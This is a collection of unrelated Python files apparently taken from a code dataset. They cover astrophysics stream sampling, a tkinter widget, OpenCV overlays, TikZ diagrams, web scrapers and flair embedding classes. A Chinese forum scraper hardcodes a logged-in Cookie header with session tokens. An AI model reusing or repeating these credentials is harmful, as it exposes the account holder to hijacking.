units\npal5=Orbit(p5._orb.vxvv)\n\n#mass of Pal 5 from Dehnen https://arxiv.org/pdf/astro-ph/0401422.pdf\nspdf= streamspraydf.streamspraydf(60000.*units.Msun,progenitor=pal5,pot=nobarpot,tdisrupt=5.*units.Gyr)\nspdft= streamspraydf.streamspraydf(60000.*units.Msun,progenitor=pal5,pot=nobarpot,leading=False,tdisrupt=5.*units.Gyr)\n\nN=1000\n\n#Rt,vRt,vTt,zt,vzt,phit\nRvRl,pdtl= spdf.sample(n=N,returndt=True,integrate=False)\nRvRt,pdtt= spdft.sample(n=N,returndt=True,integrate=False)\n\norb_t= np.empty((6,N))\norb_l= np.empty((6,N))\n\nfor ii in range(N):\n ot=Orbit(RvRt[:,ii])\n ot.integrate(np.linspace(-pdtt[ii],0.,1001),barpot)\n \n ol=Orbit(RvRl[:,ii])\n ol.integrate(np.linspace(-pdtl[ii],0.,1001),barpot)\n \n ot= ot(0.)\n ol=ol(0.)\n orb_t[:,ii]= [ot.R(),ot.vR(),ot.vT(),ot.z(),ot.vz(),ot.phi()]\n orb_l[:,ii]= [ol.R(),ol.vR(),ol.vT(),ol.z(),ol.vz(),ol.phi()]\n\nftrail=args.output\nflead=ftrail.replace('trailing','leading')\n\nfo_trail=open(ftrail,'w')\nfo_lead=open(flead,'w')\n\nfo_trail.write(\"#R phi z vR vT vz ts\" + \"\\n\")\nfo_lead.write(\"#R phi z vR vT vz ts\" + \"\\n\")\n\nfor jj in range(N):\n fo_trail.write(str(orb_t[0][jj]) + \" \" + str(orb_t[5][jj]) + \" \" + str(orb_t[3][jj]) + \" \" + str(orb_t[1][jj]) + \" \" + str(orb_t[2][jj]) + \" \" + str(orb_t[4][jj]) + \" \" + str(pdtt[jj]) + \"\\n\")\n fo_lead.write(str(orb_l[0][jj]) + \" \" + str(orb_l[5][jj]) + \" \" + str(orb_l[3][jj]) + \" \" + str(orb_l[1][jj]) + \" \" + str(orb_l[2][jj]) + \" \" + str(orb_l[4][jj]) + \" \" + str(pdtl[jj]) + \"\\n\")\n \nfo_trail.close()\nfo_lead.close()\n\n\n\n\n","sub_path":"run_on_cluster/sample_particle_spray_stream_test.py","file_name":"sample_particle_spray_stream_test.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"599476897","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# readsemcsv\n# utilisatires pour lire une semain dans les csv de mois\n\n# le fichier zip doit s'appeler BIDAAABBBmmyy\n\n# la fonction presentzip(paire,mois,year) dit si le zip est dispo\n# la fonction creenomzip(paire mois year) renvoie la liste des zip correspondant a la semaine\n\n\nimport zipfile\nimport datesemainutils\n\n# renvoie la liste des zip a utiliser pour pouvoir charger cette semaine\n# accompagnée de la date 
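# (English translation of the French comment above: returns the list of zip
# archives needed to load the requested week, each paired with the
# day/month/year of the first day to read from that file; the zip name
# follows the yyyymm<pair>.zip pattern.)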
(jour, mois annee du premier jour alire dans ce fichier\n#le nom du zip est yyymmpaire\ndef creenomzip(paire, semaine, annee):\n listemois = datesemainutils.getlistemois(semaine,annee)\n listezips = []\n for mois in listemois:\n zipname = \"%04d%02d%s.zip\" % (mois[1],mois[2],paire)\n jourdumois = mois[0]\n listezips.append([jourdumois,mois[1],mois[2],zipname])\n return listezips\n\n# import zipfile\n\n# rep ou sont les donnees\ndatarep = \"c:\\\\tmp\"\n\n\n################## readlines ####################\n# : lecture de qq jous dans un fichier mois\n# lit nbjours dans un fichier csv contenant le mois pour une paire\n# a partir du jour du mois = jour\n# ligne par ligne\n# renvoie le nb de minutes entre la ligne et datedeb\n# yield la date et la valeur\n# renvoie le nb de jours lus quand le balayage est fini (None, nbjourslus)\n# charge dans le tableau le nombre de jourd nbjours a partir du jour jour\ndef readlines(datedeb, nbjours, jour, nomzip, paire):\n # on lit le zip sur le disque\n fh1 = open(nomzip, 'rb')\n z1 = zipfile.ZipFile(fh1) # classe lisant le zipdanzs le fichier ouvert\n nbjourslus = 0\n lstday = -1\n with z1.open(paire + \".csv\", mode='r') as read1:\n for laligne in read1:\n numsample, date, begin = datesemainutils.decodelinemois(laligne) # lecture de la ligne\n if (date.month != datedeb.month): # bug : parfois le 1 er jour du mois est ds le mois prec\n continue\n if lstday != date.day: # la date a changé\n if nbjourslus != 0: # on a commence a lire des jours\n nbjourslus = nbjourslus + 1 # un nouveau jour\n else:\n print(\"\\rjour\", date.day, ) # on n'a pas commence a lire des jours : on saute\n\n lstday = date.day\n\n if date.day == jour: # on a atteint le jour recherche\n nbjourslus = 1 # on commence\n\n if nbjourslus > nbjours: # on a lu le bon nombre de jours\n break # fin du for\n\n if nbjourslus != 0:\n delta = date - datedeb # delta depuis debut semaine\n yield nbjourslus, date, int(delta.total_seconds() / 60), begin # date, valeur debut\n\n fh1.close()\n\nimport os.path\n\n#genere un tableau contenant toutes les donnees pour cette paire et cette semaine\ndef generesemaine(paire,semaine, annee):\n ok=False\n listezip = creenomzip(paire, semaine, annee) #liste jour du mois, mois, annee, nomzip\n #regarde si les zip existent\n for nomfich in listezip:\n nomfich = datarep+\"\\\\\"+nomfich[3]\n print(nomfich)\n if os.path.isfile(nomfich):\n ok = True\n else:\n readwebfile(paire,nomfich[1],nomfich[2])\n\n\n\n\n\n\n######\n#pour test\nif __name__==\"__main__\":\n generesemaine(\"aaabbb\",1,2013)\n #laliste = creenomzip(\"aaabbb\",1,2013)\n #print (laliste)\n","sub_path":"readzipsemaine.py","file_name":"readzipsemaine.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"234600057","text":"import tkinter as tk\nfrom tkinter import ttk\n\nclass ScrollableFrame(ttk.Frame):\n \"\"\"class reprsenting a special tkinter object - scrollable frame\"\"\"\n\n def __init__(self, container, height=300, width=500, *args, **kwargs):\n \"\"\"initialize widgets scrollable frame contains from\"\"\"\n\n super().__init__(container, *args, **kwargs)\n\n # canvas containing a scrollbar and output frame\n canvas = tk.Canvas(self)\n canvas.config(height=height, width=width)\n\n # scrollbar\n scrollbar = ttk.Scrollbar(self, orient=\"vertical\", command=canvas.yview)\n\n # output frame\n self.scrollable_frame = ttk.Frame(canvas)\n\n # bind scrollbar to the frame\n self.scrollable_frame.bind(\n 
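# the event-name argument just below lost its angle-bracketed string in
# transit; for a scrollable frame it is normally the "<Configure>" event,
# i.e. self.scrollable_frame.bind("<Configure>", lambda e: ...)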
\"\",\n lambda e: canvas.configure(\n scrollregion=canvas.bbox(\"all\")\n )\n )\n\n canvas.create_window((0, 0), window=self.scrollable_frame, anchor=\"nw\")\n\n canvas.configure(yscrollcommand=scrollbar.set)\n\n canvas.pack(side=\"left\", fill=\"both\", expand=True)\n scrollbar.pack(side=\"right\", fill=\"y\")\n\n def destroy(self):\n super().destroy()\n self.scrollable_frame.destroy()\n","sub_path":"crm/scrollable_frame.py","file_name":"scrollable_frame.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"436929009","text":"\"\"\"Utility functions of the package music\n\"\"\"\n\nfrom enum import Enum\nfrom datetime import date, datetime\nfrom pathlib import Path\n\nfrom woodstock.settings import *\n\n\ndef format_date(a_date):\n \"\"\"Converts a date from datetime.date() to a string of the form ' , '.\n Uses strftime() method of datetime.date class and its pre-defined format codes from\n https://docs.python.org/3/library/datetime.html#strftime-and-strptime-format-codes\n \"\"\"\n\n return a_date.strftime('%b %d, %Y') if isinstance(a_date, date) or isinstance(a_date, datetime) else 'unknown'\n\n\ndef date_py_to_json(a_date):\n \"\"\"Converts datetime.date objects to JSON.\n \"\"\"\n\n\ndef date_json_to_py(iso_date):\n \"\"\"Converts string formatted as 'YYYY-mm-dd' to datetime.date object.\n \"\"\"\n\n\ndef get_project_dir():\n \"\"\"Returns the Path object corresponding to the project root directory.\n \"\"\"\n\n # return Path(PROJECT_DIR)\n return PROJECT_DIR\n\n\ndef get_data_dir():\n \"\"\"Returns the Path object corresponding to the data directory\n (by convention located right under the project root directory).\n \"\"\"\n\n data_dir = get_project_dir() / 'data'\n data_dir.mkdir(parents=True, exist_ok=True)\n return data_dir\n\n\nif __name__ == '__main__':\n\n\n print(PROJECT_DIR)\n # print()\n # print(get_project_dir())\n # # print(settings.DATA_DIR)\n # print()\n\n # pass\n\n # Demonstrate pathlib.Path\n # - user's home dir: Path.home()\n # - current dir: Path.cwd(), Path('.'), Path()\n # - absolute path: .absolute()\n # - parent dir: .parent\n # - new dir: = / '//.../'\n # .mkdir(parents=True, exist_ok=True)\n # - remove dir: .rmdir() # requires the to be empty\n # - project dir: settings.PROJECT_DIR\n print(Path.home())\n print(type(Path.home()))\n print(Path.cwd())\n print(Path('.'))\n print(Path('.').absolute())\n print(Path().absolute())\n print(Path().absolute().parent)\n # print(Path().absolute().parents)\n print(Path().absolute().parent.parent)\n # print(type(Path().absolute().parent.parent))\n new_dir = Path.cwd() / 'd1/d2'\n print(new_dir)\n new_dir.mkdir(parents=True, exist_ok=True)\n new_dir.rmdir() # this removes just d2\n new_dir = Path.cwd() / 'd1'\n new_dir.rmdir() # this removes d1\n\n # Demonstrate get_project_dir(), get_data_dir()\n print('get_project_dir():', get_project_dir())\n print('get_data_dir():', get_data_dir())\n","sub_path":"woodstock/util/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":2662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"106693588","text":"import cv2\nimport matplotlib.pyplot as plt\n\nimg2 = cv2.imread('Aula2-VisãoComputacional/img/secret.png')\nimg1 = cv2.imread('Aula2-VisãoComputacional/img/mining.jpg')\n\nimg1 = cv2.cvtColor(img1,cv2.COLOR_BGR2RGB)\nimg2 = cv2.cvtColor(img2,cv2.COLOR_BGR2RGB)\n\nimg_menor = 
cv2.resize(img2,(1900,1600))\n\nplt.imshow(img_menor)\nplt.show()\n\nimg_maior = img1\n\nx_offset = 500\ny_offset = 500\n\nx_end = x_offset + img_menor.shape[1]\ny_end = y_offset + img_menor.shape[0]\n\n# img_menor.shape\n# Y , X , COR\n\nimg_maior[y_offset:y_end,x_offset:x_end] = img_menor\nplt.imshow(img_maior)\nplt.show()\n","sub_path":"Computer Vision/Aula2-VisãoComputacional/06-Overlays.py","file_name":"06-Overlays.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"384198002","text":"from dataclasses import dataclass\nfrom pathlib import Path\n\nfrom scripts_ import tikz\n\ncond_samples_path = Path('data/thesis/polymnist/mofop/cond_gen_single_imgs')\ninput_samples_dir = cond_samples_path / 'input_samples'\n\n\n@dataclass\nclass Nodes:\n input_m1: str = f'\\\\includegraphics[width=2cm]{{{str(input_samples_dir / \"m2_0.png\")}}}'\n input_m0: str = f'\\\\includegraphics[width=2cm]{{{str(input_samples_dir / \"m1_0.png\")}}}'\n output__m1m2_m2: str = f'\\\\includegraphics[width=2cm]{{{str(cond_samples_path / \"m1_m2\" / \"m2_0.png\")}}}'\n output__m1m2_m1: str = f'\\\\includegraphics[width=2cm]{{{str(cond_samples_path / \"m1_m2\" / \"m1_0.png\")}}}'\n output__m2_m1: str = f'\\\\includegraphics[width=2cm]{{{str(cond_samples_path / \"m2\" / \"m1_0.png\")}}}'\n output__m1_m2: str = f'\\\\includegraphics[width=2cm]{{{str(cond_samples_path / \"m1\" / \"m2_0.png\")}}}'\n q1: str = r'$q_{\\phi_1}$'\n q2: str = r'$q_{\\phi_2}$'\n q1_tilde: str = r'$\\tilde{q}_{\\phi_1}$'\n q2_tilde: str = r'$\\tilde{q}_{\\phi_2}$'\n q12_tilde: str = r'$\\tilde{q}_{\\phi_{12}}$'\n zk1: str = '$z_{k,1}$'\n zk12: str = '$z_{k,12}$'\n zk2: str = '$z_{k,2}$'\n poe: str = r'\\textbf{PoE}'\n moe: str = r'\\textbf{MoE}'\n z: str = r'joint\\\\ posterior'\n points: str = r'\\ldots'\n\n\nnodes = Nodes()\npic = tikz.Picture(\n 'PoE/.style={rectangle, draw=red!60, fill=red!5, very thick, minimum size=10mm},'\n 'MoE/.style={rectangle, draw=red!60, fill=red!5, very thick, , minimum height=20mm, minimum width=10mm},'\n # 'lr/.style={ellipse, draw=blue!60, fill=blue!5, very thick, minimum size=15mm},'\n 'm0/.style={regular polygon,regular polygon sides=4, draw=green!60, fill=green!5, very thick, minimum size=28mm},'\n 'm0_dis/.style={circle, draw=green!60, fill=green!5, very thick, minimum size=10mm},'\n 'm1/.style={regular polygon,regular polygon sides=4, draw=orange!60, fill=orange!5, very thick, minimum size=28mm},'\n 'm1_distr/.style={circle, draw=orange!60, fill=orange!5, very thick, minimum size=10mm},'\n 'lr/.style={circle, draw=gray!60, fill=gray!5, very thick, minimum size=5mm},'\n 'subset/.style={circle, draw=gray!60, fill=gray!5, very thick, minimum size=5mm},'\n)\n\npic.set_node(text=nodes.input_m0, name='input_m0')\npic.set_node(text=nodes.q1, options='m0_dis, right of=input_m0, xshift=1.5cm', name='q1')\npic.set_node(text=nodes.input_m1, options='below of=input_m0, yshift=-2cm', name='input_m1')\npic.set_node(text=nodes.q2, options='m1_distr, right of=input_m1, xshift=1.5cm', name='q2')\n\npic.set_node(text=nodes.poe, options='PoE, right of=q1, xshift=1cm, align=center', name='poe1')\npic.set_node(text=nodes.poe, options='PoE, right of=q2, xshift=1cm, align=center', name='poe2')\npic.set_node(text=nodes.poe, options='PoE, below of=poe1, yshift=-0.5cm, align=center', name='poe3')\n\npic.set_node(text=nodes.q1_tilde, options='m0_dis, right of=poe1, xshift=0.5cm', name='q1_tilde')\npic.set_node(text=nodes.q2_tilde, 
options='m1_distr, right of=poe2, xshift=0.5cm', name='q2_tilde')\npic.set_node(text=nodes.q12_tilde, options='subset, right of=poe3, xshift=0.5cm', name='q12_tilde')\n\npic.set_node(text=nodes.zk1, options='m0_dis, right of=q1_tilde, xshift=1cm', name='zk1')\npic.set_node(text=nodes.zk12, options='subset, right of=q12_tilde, xshift=1cm', name='zk12')\npic.set_node(text=nodes.zk2, options='m1_distr, right of=q2_tilde, xshift=1cm', name='zk2')\n\npic.set_node(text=nodes.moe, options='MoE, right of=zk12, xshift=1cm, align=center', name='moe')\npic.set_node(text=nodes.z, options='lr,right of=moe, xshift=1cm, align=center', name='z')\n\npic.set_node(text=nodes.output__m1m2_m2, options='right of=z, xshift=2cm,yshift=-1.5cm', name='output__m1m2_m2')\npic.set_node(text=nodes.output__m1_m2, options='right of=output__m1m2_m2, xshift=1.5cm', name='output__m1_m2')\n\npic.set_node(text=nodes.output__m1m2_m1, options='above of=output__m1m2_m2, yshift=2cm', name='output__m1m2_m1')\npic.set_node(text=nodes.output__m2_m1, options='right of=output__m1m2_m1, xshift=1.5cm', name='output__m2_m1')\n\npic.set_line('input_m0', 'q1', label=r'$enc_1$', label_pos='south')\npic.set_line('input_m1', 'q2', label=r'$enc_2$', label_pos='south')\n\npic.set_line('q1', 'poe1')\npic.set_line('q2', 'poe2')\npic.set_line('q1', 'poe3')\npic.set_line('q2', 'poe3')\n\npic.set_line('poe1', 'q1_tilde')\npic.set_line('poe2', 'q2_tilde')\npic.set_line('poe3', 'q12_tilde')\n\npic.set_line('q1_tilde', 'zk1', label='flow', label_pos='south')\npic.set_line('q12_tilde', 'zk12', label='flow', label_pos='south')\npic.set_line('q2_tilde', 'zk2', label='flow', label_pos='south')\n\npic.set_line('zk1', 'moe')\npic.set_line('zk12', 'moe')\npic.set_line('zk2', 'moe')\n\npic.set_line('moe', 'z')\n\npic.set_line('z', 'output__m1m2_m2', label=r'$dec_2$', label_pos='north', edge_options='bend right=30')\n# pic.set_line('z', 'output__m1_m2', label=r'$dec_2$', label_pos='north, rotate=-45', edge_options='bend right=50')\n\npic.set_line('z', 'output__m1m2_m1', label=r'$dec_1$\\ ', label_pos='south, rotate=10', edge_options='bend left=30')\n# pic.set_line('z', 'output__m2_m1', label=r'$dec_1$\\ ', label_pos='south, rotate=45', edge_options='bend left=50')\n\noutput = pic.make()\nprint(output)\n","sub_path":"scripts_/mofop_graph.py","file_name":"mofop_graph.py","file_ext":"py","file_size_in_byte":5159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"360920924","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n#用bs4处理效率较低,直接正则更快一些\r\nimport os\r\nimport re\r\nimport csv\r\nfrom urllib.parse import quote\r\nimport time\r\n\r\ndef search(keyword,exclude,lower,upper):\r\n url = \"http://bbs.jjwxc.net/search.php?act=search&board=3&keyword=%s&topic=3\"%keyword\r\n #此url查询三区标题,查询回帖topic=2,查询2区board=2\r\n headers = {\r\n \"Accept\":\"text/l,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\",\r\n \"Accept-Encoding\":\"gzip, deflate\",\r\n \"Accept-Language\":\"zh-CN,zh;q=0.9\",\r\n \"Connection\":\"keep-alive\",\r\n \"Cookie\" : \"__gads=ID=694b97efeb86c8c2:T=1540287492:S=ALNI_MYmL7fQknkgH9acS7bA_Zg2B8IA5Q; U\"\r\n \"M_distinctid=166a65c9be115c-01270474249844-b79193d-144000-166a65c9be634b; CNZZDA\"\r\n \"TA30012213=cnzz_eid%3D976476925-1540385198-http%253A%252F%252Fbbs.jjwxc.net%252F%2\"\r\n \"6ntime%3D1540385198; jjwxcImageCode=d0e497aa8ce44738ecf9443e7e3b959e; jjwxcImageCo\"\r\n \"deTimestamp=2018-10-24+22%3A07%3A51; nicknameAndsign=2%257E%2529%2524launa; 
token=Mj\"\r\n \"A0Mzc2ODl8YTZjOTYzNzNmZDc2Mzc0NGZhYmI4ZGE5NDEwODUzOTF8fHx8MTA4MDB8MXx8fOasoui%2Fjua\"\r\n \"CqO%2B8jOaZi%2Baxn%2BeUqOaIt3wxfG1vYmlsZQ%3D%3D; JJEVER=%7B%22ispayuser%22%3A%22204\"\r\n \"37689-1%22%2C%22foreverreader%22%3A%2220437689%22%7D; bbsnicknameAndsign=2%257E%2529\"\r\n \"%2524launa; bbstoken=MjA0Mzc2ODlfMF9jMGQ1YjNiMjVkMzRmM2RjY2QzMGMyOGY5ZDk0YmI3OV8xX18%3D\",\r\n \"Host\":\"bbs.jjwxc.net\",\r\n \"Upgrade-Insecure-Requests\": \"1\",\r\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36\"\r\n }\r\n res =requests.get(url,headers= headers)\r\n res.encoding=\"gb18030\"\r\n soup = BeautifulSoup(res.text,\"html.parser\")\r\n pageScript = soup.find(\"script\",language=\"JavaScript\").get_text()\r\n pattern = re.compile(\"\\d+\")\r\n page = pattern.findall(pageScript)#页数查找,直接正则会比较好\r\n tryurl = []\r\n for i in range(1,int(page[1])+1):\r\n time.sleep(1)\r\n print(\"正在处理第%d页\"%i)\r\n url = \"http://bbs.jjwxc.net/search.php?act=search&board=3&keyword=%s&topic=3&page=%d\"%(keyword,i)\r\n try:\r\n res =requests.get(url,headers= headers)\r\n res.encoding=\"gb18030\"\r\n soup = BeautifulSoup(res.text,\"html.parser\")\r\n content = soup.find(\"table\",cellpadding=\"2\").find_all(\"tr\",align=\"left\")\r\n for each in content:\r\n link = each.find(\"a\",href=True)\r\n title = link.get_text()\r\n reply = list(each.find_all(\"td\",align=\"right\"))[1].get_text()\r\n if int(reply)>= lower and int(reply) <= upper:\r\n judge = 0\r\n for item in exclude:\r\n if item in title:\r\n judge = 1\r\n if judge == 0:\r\n write_to_file(\"%s%s%d至%d贴.csv\"%(include,exclude,lower,upper),title+reply+\"http://bbs.jjwxc.net/\"+link.get(\"href\"))\r\n except AttributeError:\r\n tryurl.append(url)\r\n print(\"无法获得\"+url)\r\n\r\ndef write_to_file(file_name,content):\r\n with open(file_name, 'a', encoding='utf-8', newline='') as f:\r\n writer = csv.writer(f)\r\n writer.writerow(content.split())\r\n\r\n \r\nif __name__ == \"__main__\":\r\n include = input(\"请输入搜索关键词:\")\r\n exclude = list(input(\"请输入不包含的关键词,可用空格分隔(无则直接回车):\").split())\r\n replies_min = int(input (\"需要查找回帖数不低于____贴的:\"))\r\n replies_max = int(input(\"需要查找回帖数不高于____贴的:\"))\r\n content = quote(include.encode(\"gb18030\"))#urllib库中\r\n search(content,exclude,replies_min,replies_max)\r\n\r\n","sub_path":"jjwxc_search.py","file_name":"jjwxc_search.py","file_ext":"py","file_size_in_byte":3997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"638971562","text":"import requests\nfrom bs4 import BeautifulSoup\n\nheaders = {\n 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/73.0',\n}\n\nresponse = requests.get(\n 'https://www.greenpeace.org/eu-unit/blog/',\n headers=headers,\n)\n\nsoup = BeautifulSoup(response.text, 'html.parser')\n\narticles = soup.select('body > div.page-template > div > div > ul > li > div')\n\nfor article in articles:\n a_tag = article.select_one('a.search-result-item-headline')\n title = a_tag.text\n article_link = a_tag['href']\n\n date = article.select_one('span.search-result-item-date').text\n\n print(f'{date} / {title} / {article_link}')\n","sub_path":"sparta_project_EU-UNIT.py","file_name":"sparta_project_EU-UNIT.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"427428807","text":"import os\nimport re\nimport logging\nfrom abc import 
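# select_one() returns None when a CSS selector matches nothing, so the
# Greenpeace loop above raises on unexpected markup; a hedged guard:
#     a_tag = article.select_one('a.search-result-item-headline')
#     if a_tag is None:
#         continue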
abstractmethod\nfrom collections import Counter\nfrom pathlib import Path\nfrom typing import List, Union, Dict\n\nimport gensim\nimport numpy as np\nimport torch\nfrom bpemb import BPEmb\nfrom torch.nn import ParameterList, Parameter\n\nfrom torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\n\nimport flair\nfrom flair.data import Corpus\nfrom .nn import LockedDropout, WordDropout\nfrom .data import Dictionary, Token, Sentence\nfrom .file_utils import cached_path, open_inside_zip\n\nlog = logging.getLogger(\"flair\")\n\n\nclass Embeddings(torch.nn.Module):\n \"\"\"Abstract base class for all embeddings. Every new type of embedding must implement these methods.\"\"\"\n\n @property\n @abstractmethod\n def embedding_length(self) -> int:\n \"\"\"Returns the length of the embedding vector.\"\"\"\n pass\n\n @property\n @abstractmethod\n def embedding_type(self) -> str:\n pass\n\n def embed(self, sentences: Union[Sentence, List[Sentence]]) -> List[Sentence]:\n \"\"\"Add embeddings to all words in a list of sentences. If embeddings are already added, updates only if embeddings\n are non-static.\"\"\"\n\n # if only one sentence is passed, convert to list of sentence\n if type(sentences) is Sentence:\n sentences = [sentences]\n\n everything_embedded: bool = True\n\n if self.embedding_type == \"word-level\":\n for sentence in sentences:\n for token in sentence.tokens:\n if self.name not in token._embeddings.keys():\n everything_embedded = False\n else:\n for sentence in sentences:\n if self.name not in sentence._embeddings.keys():\n everything_embedded = False\n\n if not everything_embedded or not self.static_embeddings:\n self._add_embeddings_internal(sentences)\n\n return sentences\n\n @abstractmethod\n def _add_embeddings_internal(self, sentences: List[Sentence]) -> List[Sentence]:\n \"\"\"Private method for adding embeddings to all words in a list of sentences.\"\"\"\n pass\n\n\nclass TokenEmbeddings(Embeddings):\n \"\"\"Abstract base class for all token-level embeddings. 
Every new type of word embedding must implement these methods.\"\"\"\n\n    @property\n    @abstractmethod\n    def embedding_length(self) -> int:\n        \"\"\"Returns the length of the embedding vector.\"\"\"\n        pass\n\n    @property\n    def embedding_type(self) -> str:\n        return \"word-level\"\n\n\nclass StackedEmbeddings(TokenEmbeddings):\n    \"\"\"A stack of embeddings, used if you need to combine several different embedding types.\"\"\"\n\n    def __init__(self, embeddings: List[TokenEmbeddings]):\n        \"\"\"The constructor takes a list of embeddings to be combined.\"\"\"\n        super().__init__()\n\n        self.embeddings = embeddings\n\n        # IMPORTANT: add embeddings as torch modules\n        for i, embedding in enumerate(embeddings):\n            self.add_module(\"list_embedding_{}\".format(i), embedding)\n\n        self.name: str = \"Stack\"\n        self.static_embeddings: bool = True\n\n        self.__embedding_type: str = embeddings[0].embedding_type\n\n        self.__embedding_length: int = 0\n        for embedding in embeddings:\n            self.__embedding_length += embedding.embedding_length\n\n    def embed(self, sentences: Union[Sentence, List[Sentence]], static_embeddings: bool = True):\n        # if only one sentence is passed, convert to list of sentence\n        if type(sentences) is Sentence:\n            sentences = [sentences]\n\n        for embedding in self.embeddings:\n            embedding.embed(sentences)\n\n    @property\n    def embedding_type(self) -> str:\n        return self.__embedding_type\n\n    @property\n    def embedding_length(self) -> int:\n        return self.__embedding_length\n\n    def _add_embeddings_internal(self, sentences: List[Sentence]) -> List[Sentence]:\n\n        for embedding in self.embeddings:\n            embedding._add_embeddings_internal(sentences)\n\n        return sentences\n\n    def __str__(self):\n        return f'StackedEmbeddings [{\",\".join([str(e) for e in self.embeddings])}]'\n\n\nclass BytePairEmbeddings(TokenEmbeddings):\n    def __init__(\n        self,\n        language: str,\n        dim: int = 50,\n        syllables: int = 100000,\n        cache_dir=Path(flair.cache_root) / \"embeddings\",\n    ):\n        \"\"\"\n        Initializes BP embeddings. 
Constructor downloads required files if not there.\n \"\"\"\n\n self.name: str = f\"bpe-{language}-{syllables}-{dim}\"\n self.static_embeddings = True\n self.embedder = BPEmbSerializable(\n lang=language, vs=syllables, dim=dim, cache_dir=cache_dir\n )\n\n self.__embedding_length: int = self.embedder.emb.vector_size * 2\n super().__init__()\n\n @property\n def embedding_length(self) -> int:\n return self.__embedding_length\n\n def _add_embeddings_internal(self, sentences: List[Sentence]) -> List[Sentence]:\n\n for i, sentence in enumerate(sentences):\n\n for token, token_idx in zip(sentence.tokens, range(len(sentence.tokens))):\n\n if \"field\" not in self.__dict__ or self.field is None:\n word = token.text\n else:\n word = token.get_tag(self.field).value\n\n if word.strip() == \"\":\n # empty words get no embedding\n token.set_embedding(\n self.name, torch.zeros(self.embedding_length, dtype=torch.float)\n )\n else:\n # all other words get embedded\n embeddings = self.embedder.embed(word.lower())\n embedding = np.concatenate((embeddings[0], embeddings[len(embeddings) - 1]))\n token.set_embedding(self.name, torch.tensor(embedding, dtype=torch.float))\n\n return sentences\n\n def __str__(self):\n return self.name\n\n def extra_repr(self):\n return \"model={}\".format(self.name)\n\n\nclass CharacterEmbeddings(TokenEmbeddings):\n \"\"\"Character embeddings of words, as proposed in Lample et al., 2016.\"\"\"\n\n def __init__(\n self,\n path_to_char_dict: str = None,\n char_embedding_dim: int = 25,\n hidden_size_char: int = 25,\n ):\n \"\"\"Uses the default character dictionary if none provided.\"\"\"\n\n super().__init__()\n self.name = \"Char\"\n self.static_embeddings = False\n\n # use list of common characters if none provided\n if path_to_char_dict is None:\n self.char_dictionary: Dictionary = Dictionary.load(\"common-chars\")\n else:\n self.char_dictionary: Dictionary = Dictionary.load_from_file(path_to_char_dict)\n\n self.char_embedding_dim: int = char_embedding_dim\n self.hidden_size_char: int = hidden_size_char\n self.char_embedding = torch.nn.Embedding(\n len(self.char_dictionary.item2idx), self.char_embedding_dim\n )\n self.char_rnn = torch.nn.LSTM(\n self.char_embedding_dim, self.hidden_size_char, num_layers=1, bidirectional=True\n )\n\n self.__embedding_length = self.char_embedding_dim * 2\n\n self.to(flair.device)\n\n @property\n def embedding_length(self) -> int:\n return self.__embedding_length\n\n def _add_embeddings_internal(self, sentences: List[Sentence]):\n\n for sentence in sentences:\n\n tokens_char_indices = []\n\n # translate words in sentence into ints using dictionary\n for token in sentence.tokens:\n char_indices = [self.char_dictionary.get_idx_for_item(char) for char in token.text]\n tokens_char_indices.append(char_indices)\n\n # sort words by length, for batching and masking\n tokens_sorted_by_length = sorted(\n tokens_char_indices, key=lambda p: len(p), reverse=True\n )\n d = {}\n for i, ci in enumerate(tokens_char_indices):\n for j, cj in enumerate(tokens_sorted_by_length):\n if ci == cj:\n d[j] = i\n continue\n chars2_length = [len(c) for c in tokens_sorted_by_length]\n longest_token_in_sentence = max(chars2_length)\n tokens_mask = torch.zeros(\n (len(tokens_sorted_by_length), longest_token_in_sentence),\n dtype=torch.long,\n device=flair.device,\n )\n\n for i, c in enumerate(tokens_sorted_by_length):\n tokens_mask[i, : chars2_length[i]] = torch.tensor(\n c, dtype=torch.long, device=flair.device\n )\n\n # chars for rnn processing\n chars = tokens_mask\n\n 
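# what follows: embed each character, pack the padded batch so the LSTM skips
# the padding positions, run the bidirectional char-RNN, and keep each
# token's output at its true last position as that token's embedding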
character_embeddings = self.char_embedding(chars).transpose(0, 1)\n\n packed = torch.nn.utils.rnn.pack_padded_sequence(character_embeddings, chars2_length)\n\n lstm_out, self.hidden = self.char_rnn(packed)\n\n outputs, output_lengths = torch.nn.utils.rnn.pad_packed_sequence(lstm_out)\n outputs = outputs.transpose(0, 1)\n chars_embeds_temp = torch.zeros(\n (outputs.size(0), outputs.size(2)), dtype=torch.float, device=flair.device\n )\n for i, index in enumerate(output_lengths):\n chars_embeds_temp[i] = outputs[i, index - 1]\n character_embeddings = chars_embeds_temp.clone()\n for i in range(character_embeddings.size(0)):\n character_embeddings[d[i]] = chars_embeds_temp[i]\n\n for token_number, token in enumerate(sentence.tokens):\n token.set_embedding(self.name, character_embeddings[token_number])\n\n def __str__(self):\n return self.name\n\n\nclass BPEmbSerializable(BPEmb):\n def __getstate__(self):\n state = self.__dict__.copy()\n # save the sentence piece model as binary file (not as path which may change)\n state[\"spm_model_binary\"] = 